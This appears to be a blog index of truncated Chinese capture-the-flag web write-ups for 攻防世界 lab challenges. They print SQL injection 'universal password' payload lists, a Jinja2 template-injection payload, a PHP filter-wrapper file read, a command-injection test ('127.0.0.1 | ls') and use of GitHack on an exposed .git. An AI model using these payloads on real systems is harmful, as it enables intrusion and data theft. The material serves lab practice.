Matriy's blog

baby_web-CTFWeb进阶wp-攻防世界15描述：云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹。 直接看云平台报表中心 有个id=1，http://61.147.171.105:53702/index.php?id=1 改成2，3，aaa都没有变化，尝试爆破一下(感觉做多了无非就这几种方式) 改成下面那样开始爆破 找到flag

攻防世界16-unserialize3-CTFWeb进阶根据题意，很明显是反序列化，反序列化的知识可以自己查，PHP 反序列化基础 - Hello CTF (hello-ctf.com)也行 123456class xctf{public $flag = '111';public function __wakeup(){ exit('bad requests');}?code= 以下是ctf中常用的方法： 1234567891011__wakeup() //------ 执行unserialize()时，先会调用这个函数__sleep() //------- 执行serialize()时，先会调用这个函数__destruct() //---- 对象被销毁时触发__call() //-------- 在对象上下文中调用不可访问的方法时触发__callStatic() //-- 在静态上下文中调用不可访问的方法时触发__get() //---------...

攻防世界24-inget-CTFWeb解法1：直接 ?id=’ or 1=1 –+ 或 ?id=’ or ‘1=1 ?id=’ or ‘1’=’1 –+是什么意思?当你只输入 id=' or 1=1 -- 而不包含空格时，某些数据库可能会因为语法错误无法执行，因为 -- 后面需要有一个空格才能正确地注释掉后续内容。 万能密码： 123456789101112131415161718192021222324252627282930313233343536373839' and '1'='1' or 1='1'or'='or'adminadmin'--admin' or 4=4--admin' or '1'='1'--admin888"or "a"="aadmin' or 2=2#a'...

攻防世界25-Web_python_template_injection-CTFWebpython模板注入，其实就是ssti,SSTI 注入 - Hello CTF (hello-ctf.com) 「模板注入 SSTI(Server-Side Template Injection)」 也一样，数据传递 就是可控的输入点，以 Jinja2 举例，Jinja2 在渲染的时候会把 {{}} 包裹的内容当做变量解析替换，所以当我们传入 {{表达式}} 时，表达式就会被渲染器执行。 测试一下 1http://61.147.171.105:65476/{{7*7}} 存在ssti 直接试试几个先看看 123456789{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings'...

攻防世界26-mfw-CTFWeb本文参考： WEB安全-常见源码泄露 | wh1te (lddp.github.io) 首先瞎点发现，可能存在git源码泄露问题，尝试.git访问，源码中也有按时page=flag，但访问无果 [My PHP Website](http://xx:xxx/.git) 下载工具githack，可以把整个.git 备份的文件下载下 在目录下打开cmd python GitHack.py http://61.147.171.105:64160/.git/ 下载源码，审计源码(templates下的flag文件的flag被注释了) 12345678910111213141516<?phpif (isset($_GET['page'])){ $page = $_GET['page'];}else { $page = "home";}$file = "templates/" . $page ....

攻防世界28-fileinclude-CTFWeb文件包含，看源代码 lan不为空则include$lan.php，得到flag在flag.php里，我们要让利用这个漏洞输出源码 php://filter/read/convert.base64-encode/resource=flag PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezY1bzQxNzIxZGJlZGViMTFkMTgwYTQ1ZGE3MTViY2FhfSI7DQo/Pg== base64解码即可

攻防世界29-cat-CTFWebping一下127.0.0.1 信息有限，扫描一下目录，也没找到有效信息，抓包也没发现 输入127.0.0.1 | ls 发现被过滤了一些字符，返回invalid...

攻防世界30-file_include-CTFWeb12345678<?phphighlight_file(__FILE__); include("./check.php"); if(isset($_GET['filename'])){ $filename = $_GET['filename']; include($filename); }?> 应该是做了过滤 对路径删删减减，发现分别对read...